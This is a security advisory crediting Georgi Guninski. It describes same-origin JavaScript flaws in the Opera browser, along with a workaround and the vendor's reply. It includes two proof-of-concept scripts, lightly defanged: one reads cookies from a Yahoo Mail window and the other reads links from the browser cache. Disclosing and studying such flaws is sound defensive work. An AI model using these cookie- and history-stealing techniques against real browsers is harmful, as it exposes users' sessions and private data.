|
|
|
|
| |
Opera is a multi-platform web browser. There are several JavaScript vulnerabilities in it, allowing script in an HTML page to programmatically access another page and its properties in another domain - Netscape calls this "Same Origin Vulnerability".
This makes it possible for a script in certain web page to access cookies and links in arbitrary domains to which the user has access. It is also possible for a script to read the links in the user's cache and history which at least have privacy implications if not more. In some cases, cookies and links in the cache/history may contain sensitive information such as usernames/passwords, etc. |
| |
Credit:
The information has been provided by Georgi Guninski.
|
| |
Examine the following scripts (note that '!' needs to be replaced with 'i' for the script to be active):
-(1)----------------------------------
a=window.open("http://mail.yahoo.com");
function f()
{
xx=a.document.cookie;
alert("hi"+xx);
a.document.open();
a.document.write("<h1>aa</h1><script>x=window.open('http://mail.yahoo.com');
setTimeout('z=x.document.cookie;alert(z);',5000)</"+"scr!pt>");
a.document.close();
}
setTimeout("f()",5000);
-----------------------------------
-(2)--------------------------------
a=window.open("about:cache");
function f()
{
xx=a.document.links[2];
alert("hi="+xx);
}
setTimeout("f()",5000);
-----------------------------------
In addition, the HotJava exploit at http://www.guninski.com/hotjava1-desc.html works on Opera as Jay@InfoAve.net pointed out.
Workaround:
Disable javascript (Opera suggests enabling "Use cookies to trace password protected documents")
Vendor status:
The vendor was notified on 5 November 2001 and was asked whether a fix shall be issued and when. The reply was:
You should be able to resolve the cookie issue by enabling "Use cookies to trace password protected documents", which means that pages with password protection aren't cached, cookies aren't stored, the URL shouldn't be displayed in History, etc. This is a "paranoia" option, and makes a few pages unusable. As you are probably aware, many web technologies aren't very secure, but it is inconvenient for the user to block these.
This is why the user should be given a choice to block privacy related information.
|
|
|
|
|
|
|
|
|
|
